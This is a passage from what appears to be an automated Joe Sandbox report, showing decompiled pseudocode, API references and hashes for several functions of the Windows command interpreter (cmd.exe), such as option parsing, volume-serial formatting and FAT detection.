														} else {
															_push(0);
															_push(0x400023a6);
															E00D8C5A2(_t65);
															_t22 = 1;
															 *0xdbb8b0 = 1;
														}
													} else {
														 *0xdc3cc8 = _t40;
														goto L15;
													}
												} else {
													 *0xdc3cc8 = 1;
													goto L15;
												}
											}
										} else {
											 *0xdc3cc9 = 1;
											L15:
											_t78 = E00D8D7E6(_t78);
											_t40 = 0;
											continue;
										}
										goto L20;
									}
									goto L19;
								}
							}
						}
					}
				}
				L20:
				return _t22;
			}

0x00d8c433
0x00d8c435
0x00d8c436
0x00d8c441
0x00d8c447
0x00d8c450
0x00d8c58c
0x00d8c58c
0x00d8c456
0x00d8c45a
0x00d9a90c
0x00d9a90e
0x00d9a913
0x00000000
0x00d8c460
0x00d8c460
0x00d8c468
0x00d9a902
0x00d9a902
0x00d8c46e
0x00d8c473
0x00d8c473
0x00d8c476
0x00d8c479
0x00d8c486
0x00d8c496
0x00d8c49a
0x00d9a91a
0x00d9a91c
0x00d8c4a0
0x00d8c4b3
0x00d8c4b5
0x00d8c4b9
0x00000000
0x00d8c4bf
0x00d8c4bf
0x00d8c4c6
0x00d9a922
0x00d9a922
0x00d8c4cf
0x00d8c4d4
0x00d8c4d9
0x00d8c4de
0x00000000
0x00d8c4e4
0x00d8c4e4
0x00d8c4ef
0x00d8c4f7
0x00d8c4fd
0x00d8c504
0x00d8c509
0x00d8c50c
0x00d8c512
0x00d8c514
0x00d8c514
0x00d8c527
0x00d8c529
0x00d8c52b
0x00d8c56c
0x00d8c577
0x00d8c581
0x00d8c538
0x00d8c542
0x00d8c59b
0x00000000
0x00d8c544
0x00d8c54a
0x00d8c554
0x00d9a932
0x00d9a939
0x00d9a93c
0x00d9a94d
0x00000000
0x00d9a953
0x00d9a953
0x00d9a954
0x00d9a959
0x00d9a961
0x00d9a963
0x00d9a963
0x00d9a93e
0x00d9a93e
0x00000000
0x00d9a93e
0x00d8c55a
0x00d8c55a
0x00000000
0x00d8c55a
0x00d8c554
0x00d8c583
0x00d8c583
0x00d8c561
0x00d8c568
0x00d8c56a
0x00000000
0x00d8c56a
0x00000000
0x00d8c581
0x00000000
0x00d8c56c
0x00d8c4de
0x00d8c4b9
0x00d8c49a
0x00d8c45a
0x00d8c58e
0x00d8c596

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00D8C489
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D8C490
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 00D8C4A6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D8C4AD
_wcsicmp.MSVCRT ref: 00D8C538
_wcsicmp.MSVCRT ref: 00D8C54A
_wcsicmp.MSVCRT ref: 00D8C577
_wcsicmp.MSVCRT ref: 00D9A932

Strings

DISABLEEXTENSIONS, xrefs: 00D8C532
ENABLEEXTENSIONS, xrefs: 00D8C571
ENABLEDELAYEDEXPANSION, xrefs: 00D8C544
DISABLEDELAYEDEXPANSION, xrefs: 00D9A92C

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap_wcsicmp$AllocProcess
String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
API String ID: 435930816-3086019870
Opcode ID: 61ac1e14bbc9d7dea6678686735a8c5ede132b8782f3984195a1c29375336b5f
Instruction ID: 7078736ce02656284f75ba0ffc1139d088731c241d29bfa297dc335f0c150877
Opcode Fuzzy Hash: 61ac1e14bbc9d7dea6678686735a8c5ede132b8782f3984195a1c29375336b5f
Instruction Fuzzy Hash: 3451C336214303EFDB14AF38AC55D6777D4EB4871471885AAE846D7381EB31E9018BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00DAA834, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00DAA834(intOrPtr __ecx, DWORD* __edx) {
				signed int _v8;
				char _v524;
				int _v532;
				char _v536;
				int _v540;
				void _v1060;
				long _v1068;
				char _v1072;
				int _v1076;
				void _v1596;
				int _v1604;
				char _v1608;
				void* _v1612;
				void _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				signed short _v2142;
				long _v2144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr _t98;
				WCHAR* _t102;
				short* _t104;
				WCHAR* _t105;
				DWORD* _t107;
				signed short _t108;
				DWORD* _t120;
				void* _t131;
				WCHAR* _t133;
				short* _t134;
				WCHAR* _t136;
				short* _t138;
				intOrPtr* _t142;
				signed int _t144;
				DWORD* _t146;
				signed int _t148;

				_t141 = __edx;
				_t65 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t65 ^ _t148;
				_v2136 = __ecx;
				_t146 = 0;
				_v1604 = 0x104;
				_v1612 = 0;
				_t120 = 1;
				_t145 = __edx;
				_v1608 = 1;
				memset( &_v2132, 0, 0x104);
				_v1076 = 0;
				_v1072 = 1;
				_v1068 = 0x104;
				memset( &_v1596, 0, 0x104);
				_v540 = 0;
				_v536 = 1;
				_v532 = 0x104;
				memset( &_v1060, 0, 0x104);
				_t122 =  &_v2132;
				if(E00D90C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L46:
					_push(_t146);
					_push(8);
					E00D8C5A2(_t122);
					_t146 = _t120;
					L47:
					_t120 = _t146;
					L48:
					_t147 = _t120;
					L49:
					__imp__??_V@YAXPAX@Z(_v540);
					__imp__??_V@YAXPAX@Z(_v1076);
					__imp__??_V@YAXPAX@Z();
					return E00D96FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
				}
				_t122 =  &_v1596;
				if(E00D90C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				_t122 =  &_v1060;
				if(E00D90C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				E00D90D89(_t141, _t145);
				_t131 = _v1612;
				_t142 = _t131;
				if(_t131 == 0) {
					_t142 =  &_v2132;
				}
				_t145 = _t142 + 2;
				do {
					_t98 =  *_t142;
					_t142 = _t142 + 2;
				} while (_t98 != _t146);
				_t99 = _v540;
				_t144 = _t142 - _t145 >> 1;
				if(_v540 == 0) {
					_t99 =  &_v1060;
				}
				if(_t131 == 0) {
					_t131 =  &_v2132;
				}
				_t141 = _t144 + 1;
				if(E00D94C89(_t131, _t144 + 1, _t99, _v532) == 0) {
					goto L47;
				} else {
					E00D90CF2(_t141, "\\");
					_t133 = _v1076;
					if(_t133 == 0) {
						_t133 =  &_v1596;
					}
					_t102 = _v540;
					if(_t102 == 0) {
						_t102 =  &_v1060;
					}
					_t141 =  &_v2144;
					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
						_t104 = _v540;
						_t134 = _t104;
						if(_t104 == 0) {
							_t134 =  &_v1060;
						}
						if( *_t134 != 0x5c) {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							 *((short*)(_t104 + 2)) = 0;
							goto L31;
						} else {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							_t138 = _t104;
							while( *_t104 != _t146) {
								_t138 = _t104;
								_t104 = _t104 + 2;
							}
							 *_t138 = 0;
							L31:
							_t105 = _v1076;
							_t136 = _t105;
							if(_t105 == 0) {
								_t136 =  &_v1596;
							}
							if( *_t136 == _t146) {
								_t106 = _v540;
								if(_v540 == 0) {
									_t106 =  &_v1060;
								}
								_t145 = _v2136;
								_t107 = E00DA7C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
							} else {
								if(_t105 == 0) {
									_t105 =  &_v1596;
								}
								_t137 = _v540;
								if(_v540 == 0) {
									_t137 =  &_v1060;
								}
								_t145 = _v2136;
								_push(_t105);
								_t107 = E00DA7C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
							}
							_t147 = _t107;
							if(_t107 == 0) {
								_t108 = _v2144;
								if(_t108 != 0 || _v2140 != _t108) {
									_push(_t108 & 0x0000ffff);
									E00D9274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
									_t147 = E00DA7C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
								}
							}
							goto L49;
						}
					} else {
						if(GetLastError() == 0x90) {
							goto L47;
						}
						_push(_t146);
						_push(GetLastError());
						E00D8C5A2(_t133);
						goto L48;
					}
				}
			}

0x00daa834
0x00daa83f
0x00daa846
0x00daa851
0x00daa858
0x00daa85a
0x00daa862
0x00daa86e
0x00daa871
0x00daa873
0x00daa879
0x00daa881
0x00daa88c
0x00daa892
0x00daa8a1
0x00daa8a9
0x00daa8b4
0x00daa8ba
0x00daa8c9
0x00daa8d0
0x00daa8f5
0x00daab2f
0x00daab2f
0x00daab30
0x00daab32
0x00daab39
0x00daab3b
0x00daab3b
0x00daab3d
0x00daab3d
0x00daab3f
0x00daab45
0x00daab52
0x00daab5f
0x00daab78
0x00daab78
0x00daa8fd
0x00daa91f
0x00000000
0x00000000
0x00daa927
0x00daa949
0x00000000
0x00000000
0x00daa956
0x00daa95b
0x00daa961
0x00daa965
0x00daa967
0x00daa967
0x00daa96d
0x00daa970
0x00daa970
0x00daa973
0x00daa976
0x00daa97b
0x00daa983
0x00daa987
0x00daa989
0x00daa989
0x00daa991
0x00daa993
0x00daa993
0x00daa99f
0x00daa9a8
0x00000000
0x00daa9ae
0x00daa9b9
0x00daa9be
0x00daa9c6
0x00daa9c8
0x00daa9c8
0x00daa9ce
0x00daa9d6
0x00daa9d8
0x00daa9d8
0x00daa9e2
0x00daa9f9
0x00daaa20
0x00daaa26
0x00daaa2a
0x00daaa2c
0x00daaa2c
0x00daaa36
0x00daaa59
0x00daaa5b
0x00daaa5b
0x00daaa63
0x00000000
0x00daaa38
0x00daaa3a
0x00daaa3c
0x00daaa3c
0x00daaa42
0x00daaa4b
0x00daaa46
0x00daaa48
0x00daaa48
0x00daaa52
0x00daaa67
0x00daaa67
0x00daaa6d
0x00daaa71
0x00daaa73
0x00daaa73
0x00daaa7c
0x00daaab2
0x00daaaba
0x00daaabc
0x00daaabc
0x00daaac2
0x00daaad0
0x00daaa7e
0x00daaa80
0x00daaa82
0x00daaa82
0x00daaa88
0x00daaa90
0x00daaa92
0x00daaa92
0x00daaa98
0x00daaa9e
0x00daaaa8
0x00daaaad
0x00daaad8
0x00daaadc
0x00daaade
0x00daaae6
0x00daaaf3
0x00daab0d
0x00daab2b
0x00daab2b
0x00daaae6
0x00000000
0x00daaadc
0x00daa9fb
0x00daaa06
0x00000000
0x00000000
0x00daaa0c
0x00daaa13
0x00daaa14
0x00000000
0x00daaa1a
0x00daa9f9

APIs

memset.MSVCRT ref: 00DAA879
memset.MSVCRT ref: 00DAA8A1
memset.MSVCRT ref: 00DAA8C9

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,00D821E8,?,?,?,-00000105,-00000105,-00000105), ref: 00DAA9F1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00DAA9FB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00DAAA0D
??_V@YAXPAX@Z.MSVCRT ref: 00DAAB45
??_V@YAXPAX@Z.MSVCRT ref: 00DAAB52
??_V@YAXPAX@Z.MSVCRT ref: 00DAAB5F

Strings

%04X-%04X, xrefs: 00DAAAFC

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$ErrorLast$InformationVolume
String ID: %04X-%04X
API String ID: 2748242238-1126166780
Opcode ID: 192846890019aa65460b60a6d8815172bd8e4475a38e707c6e5aaec5b7792f5b
Instruction ID: dd4dbc2e40dc6b2d927428a3baab0631df62083fa47991c68fd733647af269b0
Opcode Fuzzy Hash: 192846890019aa65460b60a6d8815172bd8e4475a38e707c6e5aaec5b7792f5b
Instruction Fuzzy Hash: C391B1B1A012299BDF24DB28CC85AEAB7B9EF55354F4402D9F509E3140EB349E84CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D93121, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00D93121(void* __ecx, void* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				long _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				void* _v1100;
				void _v1620;
				long _v1624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				WCHAR* _t64;
				WCHAR* _t84;
				signed int _t86;
				void* _t87;
				WCHAR* _t89;
				WCHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;

				_t109 = __edx;
				_t47 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t47 ^ _t112;
				_v560 = 1;
				_t89 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t111 = __edx;
				_t110 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E00D90C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					 *0xdc3cf0 = 8;
					_t64 = _t89;
					goto L21;
				} else {
					_t79 = _v1100;
					 *0xdc3cf0 = 0;
					if(_v1100 == 0) {
						_t79 =  &_v1620;
					}
					_t109 = _t111;
					if(E00D94C89(_t110, _t111, _t79, _v1092) != 0) {
						_t81 = _v1100;
						if(_v1100 == 0) {
							_t81 =  &_v1620;
						}
						E00D90D89(_t109, _t81);
						E00D90CF2(_t109, "\\");
						_t102 = _v564;
						if(_t102 == 0) {
							_t102 =  &_v1084;
						}
						_t84 = _v28;
						if(_t84 == 0) {
							_t84 =  &_v548;
						}
						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
							_t86 = GetLastError();
							_t46 = _t86 - 0x90; // -144
							asm("sbb ecx, ecx");
							 *0xdc3cf0 =  ~_t46 & _t86;
						} else {
							_t87 = _v564;
							if(_t87 == 0) {
								_t87 =  &_v1084;
							}
							__imp___wcsicmp(_t87, L"FAT");
							if(_t87 == 0) {
								if(_v1624 == 0xc) {
									_t64 = 1;
									L21:
									_t89 = _t64;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v1100);
				__imp__??_V@YAXPAX@Z(_v28);
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
			}

0x00d93121
0x00d9312c
0x00d93133
0x00d9313e
0x00d93146
0x00d93148
0x00d93154
0x00d9315c
0x00d9315e
0x00d93160
0x00d93168
0x00d93170
0x00d93174
0x00d93180
0x00d93188
0x00d93193
0x00d9319a
0x00d931a9
0x00d931d5
0x00d9dbf0
0x00d9dbfa
0x00000000
0x00d93229
0x00d93229
0x00d9322f
0x00d93237
0x00d93239
0x00d93239
0x00d93245
0x00d93251
0x00d93257
0x00d9325f
0x00d93261
0x00d93261
0x00d9326e
0x00d9327e
0x00d93283
0x00d9328b
0x00d9dbb6
0x00d9dbb6
0x00d93291
0x00d93296
0x00d93310
0x00d93310
0x00d932b3
0x00d9dbd3
0x00d9dbd9
0x00d9dbe1
0x00d9dbe5
0x00d932b9
0x00d932b9
0x00d932c1
0x00d93318
0x00d93318
0x00d932c9
0x00d932d3
0x00d9dbc8
0x00d9dbd0
0x00d9dbfc
0x00d9dbfc
0x00d9dbfc
0x00d9dbc8
0x00d932d3
0x00d932b3
0x00d93251
0x00d932df
0x00d932e9
0x00d932f6
0x00d9330f

APIs

memset.MSVCRT ref: 00D93160
memset.MSVCRT ref: 00D93180
memset.MSVCRT ref: 00D931A9

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,00D821E8,?,?,?,-00000105,-00000105,-00000105), ref: 00D932AB
_wcsicmp.MSVCRT ref: 00D932C9
??_V@YAXPAX@Z.MSVCRT ref: 00D932DF
??_V@YAXPAX@Z.MSVCRT ref: 00D932E9
??_V@YAXPAX@Z.MSVCRT ref: 00D932F6

Strings

FAT, xrefs: 00D932C3

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$InformationVolume_wcsicmp
String ID: FAT
API String ID: 4247940253-238207945
Opcode ID: 1bc229e37e0926215f695839c353304b014d3eb8a563e78c113a28648b037c2b
Instruction ID: 84bc9d1edf6cd1b6308f09594fe3db4056c6d76a2aa95f080fa3aa27c0311889
Opcode Fuzzy Hash: 1bc229e37e0926215f695839c353304b014d3eb8a563e78c113a28648b037c2b
Instruction Fuzzy Hash: 2D516FB1A002199BDF14DBA4DD89BEEB7B9EB04344F0401E9E509E3251EB349F84CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D8AD44, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00D8AD44(WCHAR* __ecx) {
				signed int _v8;
				void* _v608;
				long _v612;
				char _v616;
				int _v620;
				void* _v624;
				void _v1140;
				WCHAR* _v1144;
				WCHAR* _v1148;
				void* _v1152;
				void* _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				WCHAR* _t45;
				int _t48;
				wchar_t* _t49;
				long _t50;
				intOrPtr* _t51;
				signed int _t57;
				void* _t59;
				void* _t60;
				signed int _t61;
				WCHAR* _t62;
				void* _t78;
				void* _t81;
				signed int _t82;
				WCHAR* _t84;
				void* _t85;
				WCHAR* _t86;
				wchar_t* _t87;
				signed int _t89;
				signed int _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x47c;
				_t32 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t32 ^ _t91;
				_push(_t59);
				_t84 = __ecx;
				_v1144 = __ecx;
				if(__ecx == 0) {
					_t34 = 0;
					L11:
					_pop(_t81);
					_pop(_t85);
					_pop(_t60);
					return E00D96FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
				}
				_v616 = 1;
				_t82 = 0;
				_v612 = 0x104;
				_v620 = 0;
				memset( &_v1140, 0, 0x104);
				_t91 = _t91 + 0xc;
				if(E00D90C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					__imp__??_V@YAXPAX@Z(_v620);
					_t34 = _t82;
					goto L11;
				}
				_t45 = _v620;
				if(_t45 == 0) {
					_t45 =  &_v1140;
				}
				_t61 = GetFullPathNameW(E00D922C0(_t59, _t84), _v612, _t45,  &_v1148);
				if(_t61 == 0) {
					L9:
					_t82 = _t61;
					goto L10;
				} else {
					_t86 = _v620;
					if(_t86 == 0) {
						_t86 =  &_v1140;
					}
					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
					_t91 = _t91 + 0xc;
					if(_t48 == 0) {
						_t62 = _v1144;
						_t87 =  &(_t86[4]);
						_v1148 = _t87;
						_t49 = wcsstr(_t62, _t87);
						_v1148 = _t49;
						if(_t49 == 0 || _t49 <= _t62) {
							_t50 = GetFileAttributesW(_t62);
						} else {
							 *_t49 = 0;
							_t50 = GetFileAttributesW(_t62);
							 *_v1148 =  *_t49 & 0x0000ffff;
						}
						if(_t50 != 0xffffffff) {
							_t82 = _t50;
						}
						goto L10;
					} else {
						_t51 = _v1148;
						if(_t51 == 0 ||  *_t51 == _t82) {
							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
						} else {
							_t79 = _t86;
							_t61 = E00D968BA(E00D96A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
							E00D8CD27( *((intOrPtr*)(_t91 + 0x14)));
							if(_t61 == 0) {
								_t57 = _t86[1] & 0x0000ffff;
								_t78 = 0x5c;
								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
									if(GetDriveTypeW(_t86) > 1) {
										_t61 = 1;
									}
								}
							}
						}
						goto L9;
					}
				}
			}

0x00d8ad4c
0x00d8ad52
0x00d8ad59
0x00d8ad60
0x00d8ad62
0x00d8ad64
0x00d8ad6b
0x00d8aeac
0x00d8ae71
0x00d8ae78
0x00d8ae79
0x00d8ae7a
0x00d8ae85
0x00d8ae85
0x00d8ad76
0x00d8ad7f
0x00d8ad81
0x00d8ad8c
0x00d8ad95
0x00d8ada0
0x00d8adc0
0x00d8ae61
0x00d8ae68
0x00d8ae6f
0x00000000
0x00d8ae6f
0x00d8adc6
0x00d8adcf
0x00da122a
0x00da122a
0x00d8adf0
0x00d8adf4
0x00d8ae5f
0x00d8ae5f
0x00000000
0x00d8adf6
0x00d8adf6
0x00d8adff
0x00da1233
0x00da1233
0x00d8ae0d
0x00d8ae13
0x00d8ae18
0x00da123c
0x00da1240
0x00da1245
0x00da1249
0x00da124f
0x00da1257
0x00da1276
0x00da125d
0x00da1263
0x00da1266
0x00da1270
0x00da1270
0x00da127f
0x00da1285
0x00da1285
0x00000000
0x00d8ae1e
0x00d8ae1e
0x00d8ae24
0x00da12b0
0x00d8ae33
0x00d8ae37
0x00d8ae53
0x00d8ae56
0x00d8ae5d
0x00d8ae86
0x00d8ae8c
0x00d8ae90
0x00da1296
0x00da129e
0x00da129e
0x00da1296
0x00d8ae90
0x00d8ae5d
0x00000000
0x00d8ae24
0x00d8ae18

APIs

memset.MSVCRT ref: 00D8AD95

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 00D8ADEA
wcsncmp.MSVCRT(?,\\.\,00000004), ref: 00D8AE0D
??_V@YAXPAX@Z.MSVCRT ref: 00D8AE68
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 00DA128D

Part of subcall function 00D922C0: wcschr.MSVCRT ref: 00D922CC

wcsstr.MSVCRT ref: 00DA1249
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00DA1266
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00DA12A5

Part of subcall function 00D968BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,00D96A00,00D96A00,?,00D8AE4F,00000037,00000000,?), ref: 00D968E6

Part of subcall function 00D8CD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00DA9362,00000000,00000000,?,00D99814,00000000), ref: 00D8CD55

Strings

\\.\, xrefs: 00D8AE07

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
String ID: \\.\
API String ID: 52035941-2900601889
Opcode ID: 00c71b5739b77f079c75df477cfc9a2acc610715d9a40c2b465802864a8e0e29
Instruction ID: e26376df39bb6aabbbc0e36fbe3a38ba76b4cec716c863a72700741e09d59d8b
Opcode Fuzzy Hash: 00c71b5739b77f079c75df477cfc9a2acc610715d9a40c2b465802864a8e0e29
Instruction Fuzzy Hash: 0A41D3756083429BDB21AF649889A6FB7E8EF85750F08091EF895C3291EB70D904C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00DAAEE5, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00DAAEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
				signed int _v8;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				signed char _v125;
				signed int _v132;
				int _v136;
				signed int _v140;
				signed short* _v144;
				void* _v148;
				signed int _v152;
				int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t96;
				signed int _t105;
				void* _t111;
				long _t113;
				void* _t115;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t129;
				signed int _t138;
				void _t142;
				long _t144;
				long _t146;
				signed short* _t154;
				void* _t157;
				signed short _t164;
				signed int _t171;
				signed int _t173;
				signed char _t177;
				signed char _t179;
				long _t180;
				int _t185;
				void* _t188;
				signed int _t191;
				void* _t192;
				void* _t193;
				signed int* _t194;
				int _t197;
				signed short* _t198;
				void* _t199;
				int _t200;
				signed short* _t203;
				intOrPtr _t204;
				signed int _t205;
				void* _t206;

				_t96 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t96 ^ _t205;
				_t154 = __ecx;
				_v148 = __ecx;
				_v136 = _a8;
				_v108 = 0;
				_v100 = 0;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v104 = 0;
				_v98 = 0;
				_v94 = 0;
				_v90 = 0;
				_v86 = 0;
				_v82 = 0;
				_v78 = 0;
				_v74 = 0;
				_v70 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00DAB4DD(0);
				_t157 = 0x2c;
				_t191 = E00D900B0(_t157);
				if(_t191 == 0) {
					E00DA9287(_t157);
					__imp__longjmp(0xdbb8b8, 1);
				}
				_t187 =  &_v124;
				 *((intOrPtr*)(_t191 + 8)) = 0x800;
				asm("sbb esi, esi");
				_t197 =  ~_a4 & 0x00000010;
				E00D8CB48( &_v124);
				_t159 = _v48;
				if(_v48 == 0 || E00D93B5D(_t159,  &_v124) == 1) {
					L57:
					E00D95D39();
					_t105 = 0;
				} else {
					_t187 = 0;
					if(E00D94800( &_v124, 0, 1,  &_v132) == 1) {
						goto L57;
					} else {
						_t187 = _t191;
						_t197 = _v132;
						_t111 = E00D95590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
						if(_t111 != 0) {
							goto L57;
						} else {
							if( *(_t197 + 0x14) != _t111) {
								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E00DA9C40);
								_t206 = _t206 + 0x10;
							}
							_t164 = 0x22;
							_t198 = _t154;
							_v125 = 0;
							_t191 = 0;
							_t187 = 2;
							while(1) {
								_t113 =  *_t198 & 0x0000ffff;
								if(_t113 == 0) {
									break;
								}
								if(_t113 != _t164) {
									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
										_v125 = 1;
									}
									_t187 = 2;
									 *_t154 =  *_t198;
									_t164 = 0x22;
									goto L18;
								} else {
									_t185 = _v136;
									_t191 = _t191 + _t187;
									_v125 = 1;
									_t198 = _t198 + _t187;
									if(_t185 >= _t191 >> 1) {
										_v136 = _t185 - 1;
									}
									_t164 = 0x22;
									if( *_t198 == _t164) {
										 *_t154 = _t164;
										L18:
